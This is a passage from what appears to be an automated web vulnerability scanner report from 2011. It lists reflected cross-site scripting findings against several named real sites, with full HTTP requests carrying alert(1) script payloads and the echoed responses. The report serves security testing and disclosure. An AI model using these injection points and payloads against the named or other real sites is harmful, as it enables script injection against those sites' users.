if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
e;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"", c5:"", c6:"", c10:"f6e67<script>alert(1)</script>afb97656188", c15:"", c16:"", r:""});

2.19. http://b.scorecardresearch.com/beacon.js [c15 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 71f41<script>alert(1)</script>bff8cc07395 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=&c4=&c5=&c6=&c10=&c15=71f41<script>alert(1)</script>bff8cc07395 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 21 Sep 2011 14:14:20 GMT
Date: Wed, 07 Sep 2011 14:14:20 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"71f41<script>alert(1)</script>bff8cc07395", c16:"", r:""});

2.20. http://b.scorecardresearch.com/beacon.js [c2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload c84f7<script>alert(1)</script>7046597ac2c was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322c84f7<script>alert(1)</script>7046597ac2c&c3=&c4=&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 21 Sep 2011 14:14:19 GMT
Date: Wed, 07 Sep 2011 14:14:19 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"6864322c84f7<script>alert(1)</script>7046597ac2c", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

2.21. http://b.scorecardresearch.com/beacon.js [c3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload a046a<script>alert(1)</script>d230dd3e0c7 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=a046a<script>alert(1)</script>d230dd3e0c7&c4=&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 21 Sep 2011 14:14:19 GMT
Date: Wed, 07 Sep 2011 14:14:19 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
ry{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"6864322", c3:"a046a<script>alert(1)</script>d230dd3e0c7", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

2.22. http://b.scorecardresearch.com/beacon.js [c4 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 72c58<script>alert(1)</script>5135e87dd6a was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=&c4=72c58<script>alert(1)</script>5135e87dd6a&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 21 Sep 2011 14:14:20 GMT
Date: Wed, 07 Sep 2011 14:14:20 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"72c58<script>alert(1)</script>5135e87dd6a", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

2.23. http://b.scorecardresearch.com/beacon.js [c5 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 495f7<script>alert(1)</script>80f8dd7325a was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=&c4=&c5=495f7<script>alert(1)</script>80f8dd7325a&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 21 Sep 2011 14:14:20 GMT
Date: Wed, 07 Sep 2011 14:14:20 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"", c5:"495f7<script>alert(1)</script>80f8dd7325a", c6:"", c10:"", c15:"", c16:"", r:""});

2.24. http://b.scorecardresearch.com/beacon.js [c6 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 9bb3e<script>alert(1)</script>b822407984 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=&c4=&c5=&c6=9bb3e<script>alert(1)</script>b822407984&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 21 Sep 2011 14:14:20 GMT
Date: Wed, 07 Sep 2011 14:14:20 GMT
Content-Length: 1233
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"", c5:"", c6:"9bb3e<script>alert(1)</script>b822407984", c10:"", c15:"", c16:"", r:""});

2.25. http://data.weatherzone.com.au/json/animator/ [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://data.weatherzone.com.au
Path:	/json/animator/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 589e8<script>alert(1)</script>d9ebc61394f was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json/animator/?lt=radarz&lc=070&type=radar&df=HH%3Amm%20z&frames=4&callback=cbrad070589e8<script>alert(1)</script>d9ebc61394f HTTP/1.1
Host: data.weatherzone.com.au
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_jk/1.2.31
Content-Length: 1138
Content-Type: text/javascript
Cache-Control: max-age=10
Expires: Wed, 07 Sep 2011 14:17:22 GMT
Date: Wed, 07 Sep 2011 14:17:12 GMT
Connection: close
Vary: Accept-Encoding

cbrad070589e8<script>alert(1)</script>d9ebc61394f({
"frames": [
{ "image": "http://data.weatherzone.com.au/httpdata_r/images/radar/anims/rad_15lev_070_zoom_640x480/rad_15lev_070_zoom_640x480.201109071330.png", "timestamp": 1315402200000, "times
...[SNIP]...

2.26. http://feed.video.news.com.au/f/g5OqK/8MZ0EQEjgP7F/2120022090 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://feed.video.news.com.au
Path:	/f/g5OqK/8MZ0EQEjgP7F/2120022090

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ba7da<script>alert(1)</script>f54888f1a38 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fba7da<script>alert(1)</script>f54888f1a38/g5OqK/8MZ0EQEjgP7F/2120022090?callback=_jqjsp HTTP/1.1
Host: feed.video.news.com.au
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1437
Server: Jetty(6.1.19)
Expires: Wed, 07 Sep 2011 14:14:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 07 Sep 2011 14:14:59 GMT
Connection: close
Vary: Accept-Encoding

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 404 NOT_FOUND</title>
</head>
<body><h2>HTTP ERROR 404</h2>
<p>Problem accessing /fba7da<script>alert(1)</script>f54888f1a38/g5OqK/8MZ0EQEjgP7F/2120022090. Reason:
<pre>
...[SNIP]...

2.27. http://feed.video.news.com.au/f/g5OqK/8MZ0EQEjgP7F/2120022090 [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://feed.video.news.com.au
Path:	/f/g5OqK/8MZ0EQEjgP7F/2120022090

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f0947<script>alert(1)</script>37466815b88 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /f/g5OqK/8MZ0EQEjgP7F/2120022090?callback=_jqjspf0947<script>alert(1)</script>37466815b88 HTTP/1.1
Host: feed.video.news.com.au
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Last-Modified: Wed, 07 Sep 2011 11:23:25 GMT
Access-Control-Allow-Origin: *
Server: Jetty(6.1.19)
Expires: Wed, 07 Sep 2011 14:19:58 GMT
Date: Wed, 07 Sep 2011 14:14:58 GMT
Content-Length: 5229
Connection: close
Vary: Accept-Encoding

_jqjspf0947<script>alert(1)</script>37466815b88({"$xmlns":{"pl1":"http://mps.theplatform.com/data/Account/178843232","dcterms":"http://purl.org/dc/terms/","media":"http://search.yahoo.com/mrss/","pl":"http://xml.theplatform.com/data/object","pla":"
...[SNIP]...

2.28. http://feed.video.news.com.au/f/g5OqK/8MZ0EQEjgP7F/2120022090 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://feed.video.news.com.au
Path:	/f/g5OqK/8MZ0EQEjgP7F/2120022090

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ee248<script>alert(1)</script>d08ab2cad06 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /f/g5OqK/8MZ0EQEjgP7F/2120022090?callback=_jqjsp&ee248<script>alert(1)</script>d08ab2cad06=1 HTTP/1.1
Host: feed.video.news.com.au
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Last-Modified: Wed, 07 Sep 2011 14:14:59 GMT
Access-Control-Allow-Origin: *
Server: Jetty(6.1.19)
Expires: Wed, 07 Sep 2011 14:14:59 GMT
Date: Wed, 07 Sep 2011 14:14:59 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 5612

_jqjsp({"title":"BadParameterException","description":"'ee248<script>alert(1)</script>d08ab2cad06' is not a valid parameter.","isException":true,"responseCode":400,"serverStackTrace":"com.theplatform.module.exception.BadParameterException: 'ee248<script>
...[SNIP]...

2.29. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7187a"-alert(1)-"d3654a700b0 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D0028f825-a3f7-465e-ab75-1ee50b08b48b7187a"-alert(1)-"d3654a700b0&mpt=0028f825-a3f7-465e-ab75-1ee50b08b48b&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOgDAMA7.CMlMpTZo28JtWaifExoT4O87kO8n2S6p0bodL1X0jFYirZg_LEGIWXy6Wuq6WSrWZ.miW8pzGg30UHxTTKDcTbmHxcyANWVgdWID3c13ACsyoWv1.z5cbBw--%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html?cb=0.4898127138148993&keyword=wa/news_home&rf=http%3A//www.watoday.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:48 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:23:47 GMT
ETag: "6295e4-fba-4ac491719cec0"
Accept-Ranges: bytes
Content-Length: 5380
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D0028f825-a3f7-465e-ab75-1ee50b08b48b7187a"-alert(1)-"d3654a700b0");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D0028f825-a3f7-465e-ab75-1ee50b08b48b7187a"-alert(1
...[SNIP]...

2.30. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69f70'%3balert(1)//42938f6d53f was submitted in the mpck parameter. This input was echoed as 69f70';alert(1)//42938f6d53f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D0028f825-a3f7-465e-ab75-1ee50b08b48b69f70'%3balert(1)//42938f6d53f&mpt=0028f825-a3f7-465e-ab75-1ee50b08b48b&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOgDAMA7.CMlMpTZo28JtWaifExoT4O87kO8n2S6p0bodL1X0jFYirZg_LEGIWXy6Wuq6WSrWZ.miW8pzGg30UHxTTKDcTbmHxcyANWVgdWID3c13ACsyoWv1.z5cbBw--%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html?cb=0.4898127138148993&keyword=wa/news_home&rf=http%3A//www.watoday.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:50 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:23:47 GMT
ETag: "6295e4-fba-4ac491719cec0"
Accept-Ranges: bytes
Content-Length: 5386
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
n2S6p0bodL1X0jFYirZg_LEGIWXy6Wuq6WSrWZ.miW8pzGg30UHxTTKDcTbmHxcyANWVgdWID3c13ACsyoWv1.z5cbBw--&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-46?mpt=0028f825-a3f7-465e-ab75-1ee50b08b48b69f70';alert(1)//42938f6d53f" target="_blank">
...[SNIP]...

2.31. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c937c'%3balert(1)//5a180c5ccee was submitted in the mpvc parameter. This input was echoed as c937c';alert(1)//5a180c5ccee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D0028f825-a3f7-465e-ab75-1ee50b08b48b&mpt=0028f825-a3f7-465e-ab75-1ee50b08b48b&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOgDAMA7.CMlMpTZo28JtWaifExoT4O87kO8n2S6p0bodL1X0jFYirZg_LEGIWXy6Wuq6WSrWZ.miW8pzGg30UHxTTKDcTbmHxcyANWVgdWID3c13ACsyoWv1.z5cbBw--%26redirectURL%3Dc937c'%3balert(1)//5a180c5ccee HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html?cb=0.4898127138148993&keyword=wa/news_home&rf=http%3A//www.watoday.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:03 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:23:47 GMT
ETag: "6295e4-fba-4ac491719cec0"
Accept-Ranges: bytes
Content-Length: 5382
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
dia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOgDAMA7.CMlMpTZo28JtWaifExoT4O87kO8n2S6p0bodL1X0jFYirZg_LEGIWXy6Wuq6WSrWZ.miW8pzGg30UHxTTKDcTbmHxcyANWVgdWID3c13ACsyoWv1.z5cbBw--&redirectURL=c937c';alert(1)//5a180c5cceehttp://cdn4.eyewonder.com/cm/ck/12963-135748-32613-46?mpt=0028f825-a3f7-465e-ab75-1ee50b08b48b" target="_blank">
...[SNIP]...

2.32. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
